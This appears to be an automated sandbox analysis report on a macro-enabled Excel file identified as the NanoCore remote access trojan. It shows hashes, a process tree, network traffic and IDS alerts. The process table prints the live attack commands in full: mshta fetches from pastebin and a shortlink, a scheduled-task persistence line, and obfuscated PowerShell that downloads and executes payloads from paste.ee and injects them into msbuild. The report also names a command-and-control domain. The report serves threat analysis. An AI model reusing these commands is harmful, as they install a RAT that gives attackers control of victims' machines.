File name: | c3164407257b993dc3eb339805822f2c597e3985b3ae8bf8f08d44e3aa00fea3.xlsm |
Full analysis: | https://app.any.run/tasks/cb7c326a-d18b-46fc-9bfd-0b5ec445840b |
Verdict: | Malicious activity |
Threats: | NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. |
Analysis date: | January 18, 2020, 12:10:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | C62D0AF3BCF7063F59465671C686AA8C |
SHA1: | 3FD5698DB16D0AA72162B915C2C6CCA146FB4E5B |
SHA256: | C3164407257B993DC3EB339805822F2C597E3985B3AE8BF8F08D44E3AA00FEA3 |
SSDEEP: | 1536:qISZv7u8aNE8ZsqmasbNDGXT9W2rn7eC7NDSU0F6:qISZv7raO8Vt4y9WUWUx |
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (50.8) |
---|---|---|
.xlsx | | | Excel Microsoft Office Open XML Format document (30) |
.zip | | | Open Packaging Conventions container (15.4) |
.zip | | | ZIP compressed archive (3.5) |
AppVersion: | 12 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
TitlesOfParts: |
|
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2020:01:04 07:34:39Z |
CreateDate: | 2006:09:16 00:00:00Z |
LastModifiedBy: | - |
Creator: | - |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1359 |
ZipCompressedSize: | 389 |
ZipCRC: | 0x66e51af1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2552 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
1744 | mshta http:\\j.mp\axsxaY6 | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2992 | "C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2776 | "C:\Windows\System32\mshta.exe" http:\\pastebin.com\raw\JF0Zjp3g | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2952 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta http:\\pastebin.com\raw\JF0Zjp3g" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3356 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2716 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4044 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow@$!@$loadStri@$!@$g'.replace('@$!@f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/a81BJ')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow@$!@$loadStri@$!@$g'.replace('@$!@f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/hkHsD').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('msbuild.exe',$f) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1016 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/lyLMu')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'n'),[Microsoft.VisualBasic.CallType]::Method,'http://paste.ee/r/Mzh1I').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3536 | "{path}" | C:\WINDOWS\system32\calc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Calculator Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2552 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAAE0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2552 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$c3164407257b993dc3eb339805822f2c597e3985b3ae8bf8f08d44e3aa00fea3.xlsm | — | |
MD5:— | SHA256:— | |||
2552 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFC23A621956862873.TMP | — | |
MD5:— | SHA256:— | |||
1744 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\error[1] | — | |
MD5:— | SHA256:— | |||
1744 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1] | — | |
MD5:— | SHA256:— | |||
1744 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\warning[1] | — | |
MD5:— | SHA256:— | |||
1744 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1] | — | |
MD5:— | SHA256:— | |||
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDZRY4MWXEQZBNGGNB2O.temp | — | |
MD5:— | SHA256:— | |||
1016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LBFTHQ386CX8NY3W38OB.temp | — | |
MD5:— | SHA256:— | |||
1744 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\2094335208-widgets[1].js | text | |
MD5:F4E6E153754D44C0D7E2A39B92591278 | SHA256:C9CEAC7C1DDCA8F6A8BA8B51C1D9F11A319F1F5344D1388F82EBC0BF3E956798 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2776 | mshta.exe | GET | 200 | 104.20.67.143:80 | http://pastebin.com/raw/JF0Zjp3g | US | html | 622 b | shared |
1744 | mshta.exe | GET | 301 | 67.199.248.16:80 | http://j.mp/axsxaY6 | US | html | 140 b | shared |
1016 | powershell.exe | GET | 301 | 104.18.49.20:80 | http://paste.ee/r/Mzh1I | US | html | 162 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1744 | mshta.exe | 67.199.248.16:80 | j.mp | Bitly Inc | US | shared |
1744 | mshta.exe | 172.217.22.9:443 | www.blogger.com | Google Inc. | US | whitelisted |
1744 | mshta.exe | 172.217.23.161:443 | xnasxjnasn.blogspot.com | Google Inc. | US | whitelisted |
2776 | mshta.exe | 104.20.67.143:80 | pastebin.com | Cloudflare Inc | US | malicious |
1744 | mshta.exe | 172.217.23.109:443 | accounts.google.com | Google Inc. | US | suspicious |
4044 | powershell.exe | 104.18.49.20:443 | paste.ee | Cloudflare Inc | US | shared |
1016 | powershell.exe | 104.18.49.20:443 | paste.ee | Cloudflare Inc | US | shared |
2956 | msbuild.exe | 23.106.160.1:8756 | kada.duckdns.org | Nobis Technology Group, LLC | US | malicious |
2956 | msbuild.exe | 8.8.8.8:53 | — | Google Inc. | US | whitelisted |
1016 | powershell.exe | 104.18.49.20:80 | paste.ee | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
j.mp |
| shared |
xnasxjnasn.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
pastebin.com |
| shared |
google.com |
| whitelisted |
paste.ee |
| shared |
kada.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1744 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2776 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2956 | msbuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2956 | msbuild.exe | A Network Trojan was detected | ET TROJAN Possible NanoCore C2 60B |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |
2956 | msbuild.exe | A Network Trojan was detected | REMOTE [PTsecurity] NanoCore.RAT |